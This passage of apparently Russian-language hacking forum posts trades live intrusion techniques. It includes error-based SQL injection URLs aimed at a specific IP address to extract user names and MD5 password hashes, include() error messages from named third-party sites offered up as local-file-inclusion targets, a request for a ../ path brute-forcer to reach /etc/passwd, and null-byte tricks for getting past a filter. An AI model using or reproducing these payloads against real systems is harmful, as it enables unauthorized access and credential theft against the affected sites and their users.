Есть. Без особых даже проблем. Кури маны. Искать логин в другой таблице как вариант. id же тебе известен.
Есть SQL Injection http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `name` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)-- Меняем LIMIT 0,1 - получаем 158 пользователей... http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `pass` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)-- Первые 3 пользователя выводит md5 пароль, остальные нет... В чем может быть беда?
http://95.215.1.82/stat.php?id=' and '0' or 1 group by concat((select count(pass) from users),rand(0)|0) having sum(0)-- 1
Есть вот такие штуки: PHP: Warning: include(service.php\') [function.include]: failed to open stream: No such file or directory in /home/corpxcoz/public_html/321.co.za/home.php on line 111 ------- Warning: include(templates/default/testimonials_browse.php\') [function.include]: failed to open stream: No such file or directory in /home/pmagic/public_html/helpdesk/index.php on line 82 ---------------- Warning: include(/homepages/12/d281576965/htdocs/Lucid IT/components/com_pro_desk/support/templates/default/knowledgebase_browse.php\') [function.include]: failed to open stream: No such file or directory in /homepages/12/d281576965/htdocs/Lucid IT/components/com_pro_desk/support/index.php on line 85 И т.д. Подкинье брутер etc/passwd, passwd%00, который перебирает пути ../, ../../, ../../../ и т.д на валид. Желательно на перле или питоне. Спасибо.
Не пропускает запросы, где есть union select from. Просто union select - все норм, при добавление from - еррор. /*!union*/ /*!select*/ /*!from*/ не прокатило /*!union+select*/ from тоже. Изменение регистров не вариант. Есть какие-нибудь предложения? Проблема решена. Обошел так: uni%00on sele%00ct from
парни проблемка обычная скуль но точку юзать нельзя возможно обратиться к information_schema.columns например?
http://forum.antichat.ru/showpost.php?p=497033&postcount=10 // два запроса с одним параметром http://forum.antichat.ru/showpost.php?p=1047515&postcount=48 // все вместе
file('dir/'.$.'.ext'); годится только для локального "инклуда"? расширение нолем отсекаю, конфиг читаю, но чую что шелом тут не пахнет. поправьте меня если я не прав.